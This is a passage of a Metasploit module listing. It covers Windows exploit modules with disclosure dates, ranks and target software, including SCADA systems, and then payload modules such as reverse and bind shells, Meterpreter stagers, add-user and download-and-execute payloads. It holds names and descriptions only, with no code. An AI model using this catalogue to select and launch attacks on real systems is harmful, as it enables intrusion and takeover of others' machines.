windows/http/shttpd_post 2006-10-06 average SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
windows/http/solarwinds_storage_manager_sql 2011-12-07 excellent Solarwinds Storage Manager 5.1.0 SQL Injection
windows/http/steamcast_useragent 2008-01-24 average Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow
windows/http/sybase_easerver 2005-07-25 average Sybase EAServer 5.2 Remote Stack Buffer Overflow
windows/http/trackercam_phparg_overflow 2005-02-18 average TrackerCam PHP Argument Buffer Overflow
windows/http/trendmicro_officescan 2007-06-28 good Trend Micro OfficeScan Remote Stack Buffer Overflow
windows/http/webster_http 2002-12-02 average Webster HTTP Server GET Buffer Overflow
windows/http/xampp_webdav_upload_php 2012-01-14 excellent XAMPP WebDAV PHP Upload
windows/http/xitami_if_mod_since 2007-09-24 average Xitami 2.5c2 Web Server If-Modified-Since Overflow
windows/http/zenworks_uploadservlet 2010-03-30 excellent Novell ZENworks Configuration Management Remote Execution
windows/iis/iis_webdav_upload_asp 1994-01-01 excellent Microsoft IIS WebDAV Write Access Code Execution
windows/iis/ms01_023_printer 2001-05-01 good Microsoft IIS 5.0 Printer Host Header Overflow
windows/iis/ms01_026_dbldecode 2001-05-15 excellent Microsoft IIS/PWS CGI Filename Double Decode Command Execution
windows/iis/ms01_033_idq 2001-06-18 good Microsoft IIS 5.0 IDQ Path Overflow
windows/iis/ms02_018_htr 2002-04-10 good Microsoft IIS 4.0 .HTR Path Overflow
windows/iis/ms02_065_msadc 2002-11-20 normal Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
windows/iis/msadc 1998-07-17 excellent Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
windows/imap/eudora_list 2005-12-20 great Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
windows/imap/imail_delete 2004-11-12 average IMail IMAP4D Delete Overflow
windows/imap/ipswitch_search 2007-07-18 average Ipswitch IMail IMAP SEARCH Buffer Overflow
windows/imap/mailenable_login 2006-12-11 great MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
windows/imap/mailenable_status 2005-07-13 great MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
windows/imap/mailenable_w3c_select 2005-10-03 great MailEnable IMAPD W3C Logging Buffer Overflow
windows/imap/mdaemon_cram_md5 2004-11-12 great Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
windows/imap/mdaemon_fetch 2008-03-13 great MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
windows/imap/mercur_imap_select_overflow 2006-03-17 average Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
windows/imap/mercur_login 2006-03-17 average Mercur Messaging 2005 IMAP Login Buffer Overflow
windows/imap/mercury_login 2007-03-06 average Mercury/32 <= 4.01b LOGIN Buffer Overflow
windows/imap/mercury_rename 2004-11-29 average Mercury/32 v4.01a IMAP RENAME Buffer Overflow
windows/imap/novell_netmail_append 2006-12-23 average Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
windows/imap/novell_netmail_auth 2007-01-07 average Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
windows/imap/novell_netmail_status 2005-11-18 average Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
windows/imap/novell_netmail_subscribe 2006-12-23 average Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
windows/isapi/ms00_094_pbserver 2000-12-04 good Microsoft IIS Phone Book Service Overflow
windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
windows/isapi/rsa_webagent_redirect 2005-10-21 good Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
windows/isapi/w3who_query 2004-12-06 good Microsoft IIS ISAPI w3who.dll Query String Overflow
windows/ldap/imail_thc 2004-02-17 average IMail LDAP Service Buffer Overflow
windows/ldap/pgp_keyserver7 2001-07-16 good Network Associates PGP KeyServer 7 LDAP Buffer Overflow
windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow
windows/license/calicserv_getconfig 2005-03-02 normal Computer Associates License Server GETCONFIG Overflow
windows/license/flexnet_lmgrd_bof 2012-03-23 normal FlexNet License Server Manager lmgrd Buffer Overflow
windows/license/sentinel_lm7_udp 2005-03-07 average SentinelLM UDP Buffer Overflow
windows/lotus/domino_http_accept_language 2008-05-20 average IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
windows/lotus/domino_icalendar_organizer 2010-09-14 normal IBM Lotus Domino iCalendar MAILTO Buffer Overflow
windows/lotus/domino_sametime_stmux 2008-05-21 average IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
windows/lotus/lotusnotes_lzh 2011-05-24 normal Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)
windows/lpd/hummingbird_exceed 2005-05-27 average Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
windows/lpd/niprint 2003-11-05 good NIPrint LPD Request Overflow
windows/lpd/saplpd 2008-02-04 good SAP SAPLPD 6.28 Buffer Overflow
windows/lpd/wincomlpd_admin 2008-02-04 good WinComLPD <= 3.0.2 Buffer Overflow
windows/misc/agentxpp_receive_agentx 2010-04-16 good AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow
windows/misc/apple_quicktime_rtsp_response 2007-11-23 normal Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
windows/misc/asus_dpcproxy_overflow 2008-03-21 average Asus Dpcproxy Buffer Overflow
windows/misc/avidphoneticindexer 2011-11-29 normal Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow
windows/misc/bakbone_netvault_heap 2005-04-01 average BakBone NetVault Remote Heap Overflow
windows/misc/bcaaa_bof 2011-04-04 good Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
windows/misc/bigant_server 2008-04-15 average BigAnt Server 2.2 Buffer Overflow
windows/misc/bigant_server_250 2008-04-15 great BigAnt Server 2.50 SP1 Buffer Overflow
windows/misc/bigant_server_usv 2009-12-29 great BigAnt Server 2.52 USV Buffer Overflow
windows/misc/bomberclone_overflow 2006-02-16 average Bomberclone 0.11.6 Buffer Overflow
windows/misc/bopup_comm 2009-06-18 good Bopup Communications Server Buffer Overflow
windows/misc/borland_interbase 2007-07-24 average Borland Interbase Create-Request Buffer Overflow
windows/misc/borland_starteam 2008-04-02 average Borland CaliberRM StarTeam Multicast Service Buffer Overflow
windows/misc/citrix_streamprocess 2011-01-20 good Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
windows/misc/citrix_streamprocess_data_msg 2011-11-04 normal Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow
windows/misc/citrix_streamprocess_get_boot_record_request 2011-11-04 normal Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow
windows/misc/citrix_streamprocess_get_footer 2011-11-04 normal Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow
windows/misc/citrix_streamprocess_get_objects 2011-11-04 normal Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow
windows/misc/doubletake 2008-06-04 average DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
windows/misc/eiqnetworks_esa 2006-07-24 average eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
windows/misc/eiqnetworks_esa_topology 2006-07-25 average eIQNetworks ESA Topology DELETEDEVICE Overflow
windows/misc/eureka_mail_err 2009-10-22 normal Eureka Email 2.2q ERR Remote Buffer Overflow
windows/misc/fb_isc_attach_database 2007-10-03 average Firebird Relational Database isc_attach_database() Buffer Overflow
windows/misc/fb_isc_create_database 2007-10-03 average Firebird Relational Database isc_create_database() Buffer Overflow
windows/misc/fb_svc_attach 2007-10-03 average Firebird Relational Database SVC_attach() Buffer Overflow
windows/misc/gimp_script_fu 2012-05-18 normal GIMP script-fu Server Buffer Overflow
windows/misc/hp_magentservice 2012-01-12 average HP Diagnostics Server magentservice.exe Overflow
windows/misc/hp_omniinet_1 2009-12-17 great HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
windows/misc/hp_omniinet_2 2009-12-17 great HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
windows/misc/hp_omniinet_3 2011-06-29 great HP OmniInet.exe Opcode 27 Buffer Overflow
windows/misc/hp_omniinet_4 2011-06-29 good HP OmniInet.exe Opcode 20 Buffer Overflow
windows/misc/hp_ovtrace 2007-08-09 average HP OpenView Operations OVTrace Buffer Overflow
windows/misc/ib_isc_attach_database 2007-10-03 good Borland InterBase isc_attach_database() Buffer Overflow
windows/misc/ib_isc_create_database 2007-10-03 good Borland InterBase isc_create_database() Buffer Overflow
windows/misc/ib_svc_attach 2007-10-03 good Borland InterBase SVC_attach() Buffer Overflow
windows/misc/ibm_tsm_cad_ping 2009-11-04 good IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
windows/misc/ibm_tsm_rca_dicugetidentify 2009-11-04 great IBM Tivoli Storage Manager Express RCA Service Buffer Overflow
windows/misc/landesk_aolnsrvr 2007-04-13 average LANDesk Management Suite 8.7 Alert Service Buffer Overflow
windows/misc/mercury_phonebook 2005-12-19 average Mercury/32 <= v4.01b PH Server Module Buffer Overflow
windows/misc/mini_stream 2009-12-25 normal Mini-Stream 3.0.1.1 Buffer Overflow
windows/misc/mirc_privmsg_server 2008-10-02 normal mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow
windows/misc/ms07_064_sami 2007-12-11 normal Microsoft DirectX DirectShow SAMI Buffer Overflow
windows/misc/netcat110_nt 2004-12-27 great Netcat v1.10 NT Stack Buffer Overflow
windows/misc/nettransport 2010-01-02 normal NetTransport Download Manager 2.90.510 Buffer Overflow
windows/misc/poppeeper_date 2009-02-27 normal POP Peeper v3.4 DATE Buffer Overflow
windows/misc/poppeeper_uidl 2009-02-27 normal POP Peeper v3.4 UIDL Buffer Overflow
windows/misc/pxexploit 2011-08-05 excellent PXE Exploit Server
windows/misc/realtek_playlist 2008-12-16 great Realtek Media Player Playlist Buffer Overflow
windows/misc/sap_2005_license 2009-08-01 great SAP Business One License Manager 2005 Buffer Overflow
windows/misc/shixxnote_font 2004-10-04 great ShixxNOTE 6.net Font Field Overflow
windows/misc/splayer_content_type 2011-05-04 normal SPlayer 3.7 Content-Type Buffer Overflow
windows/misc/stream_down_bof 2011-12-27 good StreamDown 6.8.0 Buffer Overflow
windows/misc/talkative_response 2009-03-17 normal Talkative IRC v0.4.4.16 Response Buffer Overflow
windows/misc/tiny_identd_overflow 2007-05-14 average TinyIdentD 2.2 Stack Buffer Overflow
windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow
windows/misc/ufo_ai 2009-10-28 average UFO: Alien Invasion IRC Client Buffer Overflow
windows/misc/windows_rsh 2007-07-24 average Windows RSH daemon Buffer Overflow
windows/misc/wireshark_lua 2011-07-18 excellent Wireshark console.lua Pre-Loading Script Execution
windows/misc/wireshark_packet_dect 2011-04-18 good Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)
windows/mmsp/ms10_025_wmss_connect_funnel 2010-04-13 great Windows Media Services ConnectFunnel Stack Buffer Overflow
windows/motorola/timbuktu_fileupload 2008-05-10 excellent Timbuktu Pro Directory Traversal/File Upload
windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent Lyris ListManager MSDE Weak sa Password
windows/mssql/ms02_039_slammer 2002-07-24 good Microsoft SQL Server Resolution Overflow
windows/mssql/ms02_056_hello 2002-08-05 good Microsoft SQL Server Hello Overflow
windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Microsoft SQL Server sp_replwritetovarbin Memory Corruption
windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
windows/mssql/mssql_payload 2000-05-30 excellent Microsoft SQL Server Payload Execution
windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
windows/mysql/mysql_payload 2009-01-16 excellent Oracle MySQL for Microsoft Windows Payload Execution
windows/mysql/mysql_yassl_hello 2008-01-04 average MySQL yaSSL SSL Hello Message Buffer Overflow
windows/nfs/xlink_nfsd 2006-11-06 average Omni-NFS Server Buffer Overflow
windows/nntp/ms05_030_nntp 2005-06-14 normal Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
windows/novell/groupwisemessenger_client 2008-07-02 normal Novell GroupWise Messenger Client Buffer Overflow
windows/novell/nmap_stor 2006-12-23 average Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
windows/novell/zenworks_desktop_agent 2005-05-19 good Novell ZENworks 6.5 Desktop/Server Management Overflow
windows/oracle/extjob 2007-01-01 excellent Oracle Job Scheduler Named Pipe Command Execution
windows/oracle/osb_ndmp_auth 2009-01-14 good Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
windows/oracle/tns_arguments 2001-06-28 good Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
windows/oracle/tns_auth_sesskey 2009-10-20 great Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
windows/oracle/tns_service_name 2002-05-27 good Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
windows/pop3/seattlelab_pass 2003-05-07 great Seattle Lab Mail 5.5 POP3 Buffer Overflow
windows/postgres/postgres_payload 2009-04-10 excellent PostgreSQL for Microsoft Windows Payload Execution
windows/proxy/bluecoat_winproxy_host 2005-01-05 great Blue Coat WinProxy Host Header Overflow
windows/proxy/ccproxy_telnet_ping 2004-11-11 average CCProxy <= v6.2 Telnet Proxy Ping Overflow
windows/proxy/proxypro_http_get 2004-02-23 great Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Qbik WinGate WWW Proxy Server URL Processing Overflow
windows/scada/citect_scada_odbc 2008-06-11 normal CitectSCADA/CitectFacilities ODBC Buffer Overflow
windows/scada/codesys_web_server 2011-12-02 normal SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow
windows/scada/daq_factory_bof 2011-09-13 good DaqFactory HMI NETB Request Overflow
windows/scada/factorylink_csservice 2011-03-25 normal Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
windows/scada/factorylink_vrn_09 2011-03-21 average Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
windows/scada/iconics_genbroker 2011-03-21 good Iconics GENESIS32 Integer overflow version 9.21.201.01
windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good ICONICS WebHMI ActiveX Buffer Overflow
windows/scada/igss9_igssdataserver_listall 2011-03-24 good 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow
windows/scada/igss9_igssdataserver_rename 2011-03-24 normal 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
windows/scada/igss9_misc 2011-03-24 excellent 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
windows/scada/moxa_mdmtool 2010-10-20 great MOXA Device Manager Tool 2.1 Buffer Overflow
windows/scada/procyon_core_server 2011-09-08 normal Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow
windows/scada/realwin 2008-09-26 great DATAC RealWin SCADA Server Buffer Overflow
windows/scada/realwin_on_fc_binfile_a 2011-03-21 great DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
windows/scada/realwin_on_fcs_login 2011-03-21 great RealWin SCADA Server DATAC Login Buffer Overflow
windows/scada/realwin_scpc_initialize 2010-10-15 great DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
windows/scada/realwin_scpc_initialize_rf 2010-10-15 great DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
windows/scada/realwin_scpc_txtevent 2010-11-18 great DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
windows/scada/sunway_force_control_netdbsrv 2011-09-22 great Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57
windows/scada/winlog_runtime 2011-01-13 great Sielco Sistemi Winlog Buffer Overflow
windows/scada/winlog_runtime_2 2012-06-04 normal Sielco Sistemi Winlog Buffer Overflow 2.07.14
windows/sip/aim_triton_cseq 2006-07-10 great AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq 2006-07-10 great SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq 2006-07-10 great SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
windows/smb/ms03_049_netapi 2003-11-11 good Microsoft Workstation Service NetAddAlternateComputerName Overflow
windows/smb/ms04_007_killbill 2004-02-10 low Microsoft ASN.1 Library Bitstring Heap Overflow
windows/smb/ms04_011_lsass 2004-04-13 good Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde 2004-10-12 good Microsoft NetDDE Service Overflow
windows/smb/ms05_039_pnp 2005-08-09 good Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg 2006-06-13 good Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras 2006-06-13 average Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi 2006-08-08 good Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi 2006-11-14 good Microsoft Services MS06-066 nwapi32.dll Module Exploit
windows/smb/ms06_066_nwwks 2006-11-14 good Microsoft Services MS06-066 nwwks.dll Module Exploit
windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
windows/smb/ms07_029_msdns_zonename 2007-04-12 manual Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption
windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation Vulnerability
windows/smb/netidentity_xtierrpcpipe 2009-04-06 great Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution
windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good TABS MailCarrier v2.51 SMTP EHLO Overflow
windows/smtp/mercury_cram_md5 2007-08-18 great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
windows/smtp/njstar_smtp_bof 2011-10-31 normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
windows/smtp/wmailserver 2005-07-11 average SoftiaCom WMailserver 1.0 Buffer Overflow
windows/smtp/ypops_overflow1 2004-09-27 average YPOPS 0.6 Buffer Overflow
windows/ssh/freeftpd_key_exchange 2006-05-12 average FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
windows/ssh/freesshd_key_exchange 2006-05-12 average FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
windows/ssh/putty_msg_debug 2002-12-16 normal PuTTy.exe <= v0.53 Buffer Overflow
windows/ssh/securecrt_ssh1 2002-07-23 average SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
windows/ssh/sysax_ssh_username 2012-02-27 normal Sysax 5.53 SSH Username Buffer Overflow
windows/ssl/ms04_011_pct 2004-04-13 average Microsoft Private Communications Transport Overflow
windows/telnet/gamsoft_telsrv_username 2000-07-17 average GAMSoft TelSrv 1.5 Username Buffer Overflow
windows/telnet/goodtech_telnet 2005-03-15 average GoodTech Telnet Server <= 5.0.6 Buffer Overflow
windows/tftp/attftp_long_filename 2006-11-27 average Allied Telesyn TFTP Server 1.9 Long Filename Overflow
windows/tftp/distinct_tftp_traversal 2012-04-08 excellent Distinct TFTP 3.10 Writable Directory Traversal Execution
windows/tftp/dlink_long_filename 2007-03-12 good D-Link TFTP 1.0 Long Filename Buffer Overflow
windows/tftp/futuresoft_transfermode 2005-05-31 average FutureSoft TFTP Server 2000 Transfer-Mode Overflow
windows/tftp/opentftp_error_code 2008-07-05 average OpenTFTP SP 1.4 Error Packet Overflow
windows/tftp/quick_tftp_pro_mode 2008-03-27 good Quick FTP Pro 2.1 Transfer-Mode Overflow
windows/tftp/tftpd32_long_filename 2002-11-19 average TFTPD32 <= 2.21 Long Filename Buffer Overflow
windows/tftp/tftpdwin_long_filename 2006-09-21 great TFTPDWIN v0.4.2 Long Filename Buffer Overflow
windows/tftp/tftpserver_wrq_bof 2008-03-26 normal TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
windows/tftp/threectftpsvc_long_mode 2006-11-27 great 3CTftpSvc TFTP Long Mode Buffer Overflow
windows/unicenter/cam_log_security 2005-08-22 great CA CAM log_security() Stack Buffer Overflow (Win32)
windows/vnc/realvnc_client 2001-01-29 normal RealVNC 3.3.7 Client Buffer Overflow
windows/vnc/ultravnc_client 2006-04-04 normal UltraVNC 1.0.1 Client Buffer Overflow
windows/vnc/ultravnc_viewer_bof 2008-02-06 normal UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
windows/vnc/winvnc_http_get 2001-01-29 average WinVNC Web Server <= v3.3.3r7 GET Overflow
windows/vpn/safenet_ike_11 2009-06-01 average SafeNet SoftRemote IKE Service Buffer Overflow
windows/wins/ms04_045_wins 2004-12-14 great Microsoft WINS Service Memory Overwrite

metasploit–payload模块信息
Name Disclosure Date Rank Description


aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve shell for inetd
aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
bsd/sparc/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
bsd/sparc/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
bsd/x86/exec normal BSD Execute Command
bsd/x86/metsvc_bind_tcp normal FreeBSD Meterpreter Service, Bind TCP
bsd/x86/metsvc_reverse_tcp normal FreeBSD Meterpreter Service, Reverse TCP Inline
bsd/x86/shell/bind_ipv6_tcp normal BSD Command Shell, Bind TCP Stager (IPv6)
bsd/x86/shell/bind_tcp normal BSD Command Shell, Bind TCP Stager
bsd/x86/shell/find_tag normal BSD Command Shell, Find Tag Stager
bsd/x86/shell/reverse_ipv6_tcp normal BSD Command Shell, Reverse TCP Stager (IPv6)
bsd/x86/shell/reverse_tcp normal BSD Command Shell, Reverse TCP Stager
bsd/x86/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
bsd/x86/shell_bind_tcp_ipv6 normal BSD Command Shell, Bind TCP Inline (IPv6)
bsd/x86/shell_find_port normal BSD Command Shell, Find Port Inline
bsd/x86/shell_find_tag normal BSD Command Shell, Find Tag Inline
bsd/x86/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
bsd/x86/shell_reverse_tcp_ipv6 normal BSD Command Shell, Reverse TCP Inline (IPv6)
bsdi/x86/shell/bind_tcp normal BSDi Command Shell, Bind TCP Stager
bsdi/x86/shell/reverse_tcp normal BSDi Command Shell, Reverse TCP Stager
bsdi/x86/shell_bind_tcp normal BSDi Command Shell, Bind TCP Inline
bsdi/x86/shell_find_port normal BSDi Command Shell, Find Port Inline
bsdi/x86/shell_reverse_tcp normal BSDi Command Shell, Reverse TCP Inline
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/interact normal Unix Command, Interact with established connection
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_bash normal Unix Command Shell, Reverse TCP (/dev/tcp)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/windows/adduser normal Windows Execute net user /ADD CMD
cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via perl)
cmd/windows/bind_perl_ipv6 normal Windows Command Shell, Bind TCP (via perl) IPv6
cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby)
cmd/windows/download_eval_vbs normal Windows Executable Download and Evaluate VBS
cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs)
cmd/windows/reverse_perl normal Windows Command, Double reverse TCP connection (via perl)
cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline
java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
linux/armle/adduser normal Linux Add User
linux/armle/exec normal Linux Execute Command
linux/armle/shell_bind_tcp normal Linux Command Shell, Reverse TCP Inline
linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/ppc/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/ppc/shell_find_port normal Linux Command Shell, Find Port Inline
linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/ppc64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/ppc64/shell_find_port normal Linux Command Shell, Find Port Inline
linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x64/exec normal Linux Execute Command
linux/x64/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
linux/x64/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/x64/shell_find_port normal Linux Command Shell, Find Port Inline
linux/x64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/find_tag normal Linux Meterpreter, Find Tag Stager
linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/read_file normal Linux Read File
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/find_tag normal Linux Command Shell, Find Tag Stager
linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/x86/shell_find_port normal Linux Command Shell, Find Port Inline
linux/x86/shell_find_tag normal Linux Command Shell, Find Tag Inline
linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm demo
netware/shell/reverse_tcp normal NetWare Command Shell, Reverse TCP Stager
